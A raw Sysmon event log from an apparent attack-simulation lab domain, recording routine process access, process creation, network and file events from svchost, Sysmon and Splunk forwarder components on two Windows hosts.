07:47:31.458{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080790Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:31.458{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080789Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:31.458{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080788Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:31.458{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080787Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:31.458{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080786Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:31.458{2FDD8D40-AC98-615A-0500-00000000FD01}412428C:\Windows\system32\csrss.exe{2FDD8D40-B193-615A-2D01-00000000FD01}2564C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080785Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:31.458{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B193-615A-2D01-00000000FD01}2564C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000080784Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:31.458{2FDD8D40-B193-615A-2D01-00000000FD01}2564C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000102942Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:29.295{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49481-false10.0.1.12-8000- 354300x800000000000000080816Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:29.666{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local49987-false10.0.1.12-8000- 23542300x800000000000000080815Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:32.817{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C9E75A930FA80155ED835110EC449F76,SHA256=140AE2F7F4BF28AB29B6ED579C1190DD23C3EC49C342B2B3C883CDA90ED49A8F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102945Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:32.218{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1504E2DB5E8019DBB2C33462091FDCEC,SHA256=C3FC87432660E698B45E5F9D317E23F6A70D4A5C7A354EE598B2BF3115F9D051,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080814Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:32.692{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EA0187D64D2BE62919C5BEF39F898001,SHA256=EDC175B50E7A37DCFF485973FA68BD2C9A74EE50502797390BCD7EFCEA38F00B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080813Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:32.692{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=87C784399AE2EA0A942856DB3025253E,SHA256=66D770CB9D134DF2F6793933EFADF538671239FBCFA00F4900C3E123363D5B82,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000080812Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:32.255{2FDD8D40-B194-615A-2E01-00000000FD01}12441180C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080811Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:32.114{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B194-615A-2E01-00000000FD01}1244C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080810Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:32.114{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080809Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:32.114{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080808Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:32.114{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080807Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:32.114{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080806Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:32.114{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080805Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:32.114{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080804Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:32.114{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080803Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:32.114{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080802Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:32.114{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080801Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:32.114{2FDD8D40-AC98-615A-0500-00000000FD01}4121436C:\Windows\system32\csrss.exe{2FDD8D40-B194-615A-2E01-00000000FD01}1244C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080800Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:32.114{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B194-615A-2E01-00000000FD01}1244C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000080799Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:32.115{2FDD8D40-B194-615A-2E01-00000000FD01}1244C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000102944Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:32.015{58E9C193-ACA7-615A-1300-00000000FC01}880NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=9D6A0E6DBE2EA9CEF28DB4DFC0F559AC,SHA256=F68A7A53A9D40FD9387B7B8A45E3A5536FD660A9840AA3658AF7C1374084B2AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080830Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:33.817{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55DC061DD49FBDB744D5EA7F217C9197,SHA256=AFE22EE2C310274B5E81344B730BD3F722A9F37E17463EE783B2C154935146D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102946Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:33.234{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DADAAC98241F70EFB12A72F11FE5FD2,SHA256=730780C76F39918919263754601DAFE8F685CDEAA7DF8E0EE790BD2F8BA16395,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000080829Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 